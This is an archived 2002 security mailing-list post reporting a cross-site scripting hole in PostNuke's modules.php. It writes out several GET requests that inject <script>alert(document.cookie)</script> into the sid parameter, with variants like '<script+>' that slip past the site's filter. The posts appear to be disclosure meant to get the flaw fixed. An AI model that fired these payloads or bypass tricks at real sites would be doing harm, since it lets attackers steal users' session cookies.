OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
 
From: Sebastian Konstanty Zdrojewski (s.zdrojewski_at_not2you.com)
Date: Thu Oct 03 2002 - 02:10:23 CDT

  • Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

    I saw the problem has been solved, and the get you proposed below are no
    more working. But if you use the following get, the popup appears again:

    on the url http://news.postnuke.com/modules.php

    the get

    ?op=modload&name=News&file=article&sid=<script>alert(document.cookie);</script+>

    Best Regars,

    Sebastian

    Daniel Woods wrote:

    >Humm!
    >
    >
    >
    >
    >Not so fast on the praise :(
    >
    >It only took me a couple of workarounds to find ways to bypass the check.
    >
    > http://news.postnuke.com/modules.php
    >
    ?op=modload&name=News&file=article&sid=<script>alert(document.cookie);</script>
    >
    >Using the request...
    >
    ?op=modload&name=News&file=article&sid=<\script>alert(document.cookie);</script>
    >gives me the DB Error: message
    >
    >And using the request...
    >
    ?op=modload&name=News&file=article&sid=<script+>alert(document.cookie);</script>
    >gives me the Alert Popup and DB Error: message... the '+' is treated
    as a blank.
    >
    >Thanks... Dan.
    >
    >
    >

    -- 
    Sebastian Konstanty Zdrojewski
    IT Analyst
    

    Neticon a brand of Every Level S.r.l. Via Valtellina 16 - 20159 Milano - MI - Italy

    Phone (+39) 02.68.80.731 E-Mail s.zdrojewskineticon.it Website http://www.neticon.it